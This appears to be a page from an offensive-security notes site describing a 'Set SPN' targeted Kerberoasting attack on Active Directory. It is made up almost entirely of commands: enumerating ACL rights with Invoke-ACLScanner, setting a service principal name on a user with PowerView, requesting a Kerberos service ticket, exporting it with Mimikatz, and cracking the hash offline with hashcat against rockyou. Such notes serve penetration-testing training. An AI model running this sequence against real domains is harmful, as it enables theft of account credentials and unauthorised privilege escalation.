🟢Set SPN

Enumerate permissions for the group on ACL

Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match “<groupname>”}
Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match “<groupname>”} | select IdentityReference, ObjectDN, ActiveDirectoryRights | fl

Check if the user has SPN

. ./Powerview_dev.ps1
Get-DomainUser -Identity <username> | select samaccountname, serviceprincipalname

Get-NetUser | Where-Object {$_.servicePrincipalName}

Set SPN for the user

. ./PowerView_dev.ps1
Set-DomainObject -Identity <username> -Set @{serviceprincipalname=’ops/whatever1’}

Request a TGS

Add-Type -AssemblyName System.IdentityModel 
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ops/whatever1"

Export ticket to disk for offline cracking

Invoke-Mimikatz -Command '"Kerberos::list /export"'

Request TGS hash for offline cracking hashcat

Get-DomainUser -Identity <username> | Get-DomainSPNTicket | select -ExpandProperty Hash

Crack the hash with hashcat

Edit the hash by inserting '23' after the kerbrs

Hashcat -a 0 -m 18200 hash.txt rockyou.txt

PreviousAS-REPS Roasting NextUnconstrained Delegation

Last updated 1 year ago

hashtagEnumerate permissions for the group on ACL

hashtagCheck if the user has SPN

hashtagSet SPN for the user

hashtagRequest a TGS

hashtagExport ticket to disk for offline cracking

hashtagRequest TGS hash for offline cracking hashcat

hashtagCrack the hash with hashcat

Enumerate permissions for the group on ACL

Check if the user has SPN

Set SPN for the user

Request a TGS

Export ticket to disk for offline cracking

Request TGS hash for offline cracking hashcat

Crack the hash with hashcat